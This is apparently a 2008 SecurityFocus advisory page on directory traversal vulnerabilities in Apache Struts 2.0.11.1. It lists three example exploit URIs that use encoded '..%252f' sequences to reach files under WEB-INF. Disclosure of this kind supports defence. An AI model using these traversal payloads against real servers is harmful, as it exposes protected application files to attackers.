Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Struts Multiple Directory Traversal Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com:8080/struts2-blank-2.0.11.1/struts..
http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f
http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/







 

Privacy Statement
Copyright 2008, SecurityFocus